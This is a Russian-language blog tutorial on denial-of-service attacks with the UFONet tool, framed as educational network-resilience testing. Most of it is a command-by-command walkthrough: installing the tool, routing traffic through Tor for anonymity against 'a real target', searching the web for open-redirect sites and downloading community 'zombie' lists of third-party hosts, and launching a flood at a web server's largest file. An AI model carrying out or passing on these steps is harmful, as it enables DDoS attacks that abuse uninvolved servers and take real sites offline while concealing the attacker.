ДАННАЯ СТАТЬЯ - ЛИШЬ ОЗНАКОМИТЕЛЬНЫЙ МАТЕРИАЛ, СОЗДАННЫЙ С ОБРАЗОВАТЕЛЬНЫМИ И ПРЕДУПРЕДИТЕЛЬНЫМИ ЦЕЛЯМИ.
НИ АВТОР САЙТА, НИ СОЗДАТЕЛЬ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ НЕ ПОБУЖДАЮТ ПОВТОРЯТЬ УВИДЕННОЕ.
ВСЕ ДЕЙСТВУЮЩИЕ ЛИЦА И ИСТОРИИ ЯВЛЯЮТСЯ ВЫМЫШЛЕННЫМИ, А СХОДСТВО С РЕАЛЬНЫМИ ЛИЦАМИ И СОБЫТИЯМИ МОЖЕТ ОКАЗАТЬСЯ ЛИШЬ СЛУЧАЙНЫМ И НЕНАМЕРЕННЫМ.
В этой статье мы разберем класс атак типа "Отказ в обслуживании" на примере бесплатного инструмента UFONet, который может помочь вам выполнить атаку на web-ресурс для тестирования устойчивости сети.
Конечная цель здесь состоит в том, чтобы узнать, защищена сеть от DDoS-атак, а если нет, вы должны быть в состоянии создать отчет, объясняющий, что нужно сделать, чтобы устранить эти недостатки.
DoS-attack (Denial Of Service - отказ в обслуживании) - вид атак, целью которых довести сервер до таких условий, при которых сервер не сможет выполнять задачи пользователя (сервер становится недоступным).
DDoS-attack (Distributed Denial of Service - распределённая атака типа "отказ в обслуживании") - одно и тоже, что и DoS, но выполняется с более чем одного компьютера. Чем больше запросов на сервер, тем сильнее атака. Соответственно, DDoS-атака увеличивает шанс положить сервер.
UFONet - это бесплатный инструмент для тестирования DDoS-атак с использованием уязвимости "Open Redirect" которая позволяет незаметно направить пользователя на другие ресурсы, таких как ботнет. Этот ботнет с открытым исходным кодом прост в установке и запуске, и он способен искать уязвимые хосты, тестировать их, каталогизировать, запускать DDoS-атаки и многое другое.
Установка
Клонируем репозиторий и перейдем в каталог:
git clone https://github.com/epsylon/ufonet.git
cd ufonet
Устанавливаем необходимые библиотеки (вручную):
pip3 install GeoIP
pip3 install python-geoip
pip3 install pygeoip
pip3 install requests
pip3 install pycrypto
pip3 install pycurl
pip3 install whois
pip3 install scapy-python3
Либо ставим библиотеки автоматически:
python3 setup.py install
Обновляем:
python3 ufonet —update
Смотрим доступные нам команды:
python3 ufonet -h
Настройка Tor (Необязательно)
Если бы мы использовали UFONet для DDoS-атаки на реальную цель, мы бы настроили Tor:
apt-get install tor vidalia
apt-get install vidalia
apt-get install privoxy
apt-get install vidalia privoxy
service tor start
service privoxy start
python3 ufonet --check-tor
Но мы не собираемся совершать атаку на определенные ресурсы сети или использовать какие-либо хосты, кроме тех, которые находятся в нашей локальной сети. Мы можем пропустить настройку Tor.
Поиск уязвимых хостов
Теперь мы воспользуемся функцией поиска, чтобы найти уязвимые хосты. Я буду использовать все доступные движки, встроенные в UFONet, для поиска уязвимого хоста.
python3 ufonet -s 'proxy.php?url=' --sa
Эта команда сообщает UFONet, что необходимо искать сайты, содержащие "proxy.php?url=", используя все встроенные поисковые системы. Сайты, содержащие "proxy.php?url=", могут быть уязвимы для открытых перенаправлений. Также можно загрузить строки поиска из текстового файла с помощью команды:
python3 ufonet --sd 'botnet/dorks.txt '
Эта команда использует UFONet в виде уже готового списка «dorks.txt» для поиска потенциальных открытых уязвимостей перенаправления.
Можно использовать другой вариант с уже найденными хостами, загрузив фаил «zombie» из UFONet:
python3 ufonet --download-zombies
Хосты, предоставленные сообществом, не находятся под вашим контролем!
Теперь у нас есть большой список доступных нам зомби.
Осмотрим атакуемый ресурс
Проверим нашу цель на наличие больших файлов:
python3 ufonet -i http://192.168.1.100
Моя виртуальная машина состоит из двух размещенных страниц, эта команда не обнаружит ничего существенного. Хотя в некоторых случаях вы можете обнаружить большие файлы.
Самый большой файл на моем веб-сервере — "logo.png".
Начало DDoS-атаки
Приступим:
python3 ufonet -a http://192.168.1.100 -r 10 -b "icons/logo.png"
В этой команде флаг -a указывает цель для атаки. Флаг -r указывает, сколько раз каждый хост должен атаковать. Опция -b выбирает, куда делать запросы к атакуемому объекту.
После выполнения команды, UFONet атакует цель 10 раз для каждого зомби. Если у вас есть список из 100 зомби, в общей сложности будет сделано 1000 запросов. В частности, он запрашивает самый большой файл на сайте "logo.png".
UFONet - это лишь одна из многих программ для DDoS-атак. Для получения ботнетов используется приватное ПО, либо же зараженные хосты продаются на закрытых тематических форумах. Поминте, что запуск неизвестных приложений от известных вредоносных разработчиков может скомпрометировать вашу систему, превратив ваш компьютер в зомби или что-то похуже!
RootKit как он есть
« Предыдущая статья